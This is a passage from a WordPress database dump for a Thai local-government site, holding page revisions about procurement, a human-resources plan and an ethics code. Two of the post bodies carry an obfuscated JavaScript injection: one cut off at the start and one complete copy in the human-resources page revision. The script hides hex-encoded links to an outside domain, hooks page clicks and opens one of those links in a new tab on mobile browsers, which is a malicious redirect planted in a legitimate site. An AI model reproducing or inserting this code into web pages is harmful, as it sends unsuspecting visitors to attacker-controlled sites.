_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-07-07 14:29:41','2025-07-07 07:29:41','',14,'http://pakhaeng.ssk.in.th/?p=1740',0,'revision','',0),
(1742,1,'2025-07-07 14:41:22','2025-07-07 07:41:22','<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"1540_ebbc95-cd\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column1540_ebbc95-cd\"><div class=\"kt-inside-inner-col\"><!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->','รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568','','inherit','closed','closed','','1540-revision-v1','','','2025-07-07 14:41:22','2025-07-07 07:41:22','',1540,'http://pakhaeng.ssk.in.th/?p=1742',0,'revision','',0),
(1743,1,'2025-07-07 14:41:23','2025-07-07 07:41:23','<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"1540_ebbc95-cd\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column1540_ebbc95-cd\"><div class=\"kt-inside-inner-col\"><!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->','รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568','','inherit','closed','closed','','1540-revision-v1','','','2025-07-07 14:41:23','2025-07-07 07:41:23','',1540,'http://pakhaeng.ssk.in.th/?p=1743',0,'revision','',0),
(1744,1,'2025-07-07 14:41:23','2025-07-07 07:41:23','<iframe src=\"https://docs.google.com/spreadsheets/d/e/2PACX-1vTEIAytWLHtOH0qTJC7eyhlzKhUIUzcMGSMSAjrm8ppwUQn3qCGQqokmyPbupBLZw/pubhtml?widget=true&amp;headers=false\" height=\"1200\" width=\"100%\"></iframe>','รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568','','inherit','closed','closed','','1540-revision-v1','','','2025-07-07 14:41:23','2025-07-07 07:41:23','',1540,'http://pakhaeng.ssk.in.th/?p=1744',0,'revision','',0),
(1746,1,'2025-07-07 14:48:16','2025-07-07 07:48:16','<!-- wp:paragraph -->\n<p><iframe src=\"https://docs.google.com/spreadsheets/d/e/2PACX-1vTEIAytWLHtOH0qTJC7eyhlzKhUIUzcMGSMSAjrm8ppwUQn3qCGQqokmyPbupBLZw/pubhtml?widget=true&amp;headers=false\" width=\"100%\" height=\"1200\"></iframe></p>\n<!-- /wp:paragraph -->','รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568','','inherit','closed','closed','','1540-revision-v1','','','2025-07-07 14:48:16','2025-07-07 07:48:16','',1540,'http://pakhaeng.ssk.in.th/?p=1746',0,'revision','',0),
(1748,1,'2025-07-07 15:02:12','2025-07-07 08:02:12','','Human','','inherit','','closed','','human','','','2025-07-07 15:02:12','2025-07-07 08:02:12','',566,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Human.png',0,'attachment','image/png',0),
(1749,1,'2025-07-07 15:02:19','2025-07-07 08:02:19','<!-- wp:image {\"id\":1748,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Human-1024x256.png\" alt=\"\" class=\"wp-image-1748\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:file {\"id\":1499,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การบริหารและพัฒนาทรัพยากรบุคคล.pdf\",\"displayPreview\":true,\"previewHeight\":800} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การบริหารและพัฒนาทรัพยากรบุคคล.pdf\" type=\"application/pdf\" style=\"width:100%;height:800px\" aria-label=\"การบริหารและพัฒนาทรัพยากรบุคคล\"></object><a id=\"wp-block-file--media-00124d1a-79ba-4db0-be25-eed8c6e99073\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การบริหารและพัฒนาทรัพยากรบุคคล.pdf\">การบริหารและพัฒนาทรัพยากรบุคคล</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การบริหารและพัฒนาทรัพยากรบุคคล.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-00124d1a-79ba-4db0-be25-eed8c6e99073\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:paragraph -->\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>\n<!-- /wp:paragraph -->','แผนการบริหารและพัฒนาทรัพยากรบุคคล','','inherit','closed','closed','','566-revision-v1','','','2025-07-07 15:02:19','2025-07-07 08:02:19','',566,'http://pakhaeng.ssk.in.th/?p=1749',0,'revision','',0),
(1750,1,'2025-07-07 15:05:11','2025-07-07 08:05:11','','tham','','inherit','','closed','','tham','','','2025-07-07 15:05:11','2025-07-07 08:05:11','',1502,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/tham.png',0,'attachment','image/png',0),
(1751,1,'2025-07-07 15:05:14','2025-07-07 08:05:14','<!-- wp:image {\"id\":1750,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/tham-1024x256.png\" alt=\"\" class=\"wp-image-1750\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:file {\"id\":1503,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ประมวลจริยธรรมและการขับเคลื่อนจริยธรรม.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ประมวลจริยธรรมและการขับเคลื่อนจริยธรรม.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ประมวลจริยธรรมและการขับเคลื่อนจริยธรรม\"></object><a id=\"wp-block-file--media-675dff9d-2979-4636-9d91-1a668135f1a0\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ประมวลจริยธรรมและการขับเคลื่อนจริยธรรม.pdf\">ประมวลจริยธรรมและการขับเคลื่อนจริยธรรม</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ประมวลจริยธรรมและการขับเคลื่อนจริยธรรม.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-675dff9d-2979-4636-9d91-1a668135f1a0\">Download</a></div>\n<!-- /wp:file -->','ประมวลจริยธรรมและการขับเคลื่อนจริยธรรม','','inherit','closed','closed','','1502-revision-v1','','','2025-07-07 15:05:14','2025-07-07 08:05:14','',1502,'http://pakhaeng.ssk.in.th/?p=1751',0,'revision','',0),
